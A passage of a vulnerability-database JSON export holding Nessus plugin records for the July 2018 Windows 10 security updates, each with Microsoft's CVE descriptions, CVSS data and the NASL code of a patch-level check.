vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338826/windows-10-update-kb4338826\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?454614d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4338826.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338826');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338826])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:09", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338825.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8274, CVE-2018-8275, CVE-2018-8279,\n CVE-2018-8301)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8297, CVE-2018-8324)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338825.NASL", "href": "https://www.tenable.com/plugins/nessus/110984", "published": "2018-07-10T00:00:00", "title": "KB4338825: Windows 10 Version 1709 and Windows Server Version 1709 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110984);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8274\",\n \"CVE-2018-8275\",\n \"CVE-2018-8276\",\n \"CVE-2018-8279\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8286\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8297\",\n \"CVE-2018-8301\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8324\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104626,\n 104629,\n 104631,\n 104632,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104641,\n 104642,\n 104643,\n 104644,\n 104647,\n 104648,\n 104650,\n 104653,\n 104654,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338825\");\n script_xref(name:\"MSFT\", value:\"MS18-4338825\");\n\n script_name(english:\"KB4338825: Windows 10 Version 1709 and Windows Server Version 1709 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338825.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8274, CVE-2018-8275, CVE-2018-8279,\n CVE-2018-8301)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8297, CVE-2018-8324)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338825/windows-10-update-kb4338825\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c803961\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4338825.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338825');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338825])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:09", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290, CVE-2018-8294)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8289, CVE-2018-8297, CVE-2018-8324,\n CVE-2018-8325)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8262, CVE-2018-8274, CVE-2018-8275,\n CVE-2018-8279, CVE-2018-8301)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8278)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338819.NASL", "href": "https://www.tenable.com/plugins/nessus/110983", "published": "2018-07-10T00:00:00", "title": "KB4338819: Windows 10 Version 1803 and Windows Server Version 1803 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110983);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8262\",\n \"CVE-2018-8274\",\n \"CVE-2018-8275\",\n \"CVE-2018-8276\",\n \"CVE-2018-8278\",\n \"CVE-2018-8279\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8286\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8289\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8294\",\n \"CVE-2018-8296\",\n \"CVE-2018-8297\",\n \"CVE-2018-8301\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8324\",\n \"CVE-2018-8325\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104620,\n 104622,\n 104623,\n 104626,\n 104627,\n 104628,\n 104629,\n 104630,\n 104631,\n 104632,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104641,\n 104642,\n 104643,\n 104644,\n 104646,\n 104647,\n 104648,\n 104650,\n 104651,\n 104653,\n 104654,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338819\");\n script_xref(name:\"MSFT\", value:\"MS18-4338819\");\n\n script_name(english:\"KB4338819: Windows 10 Version 1803 and Windows Server Version 1803 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute 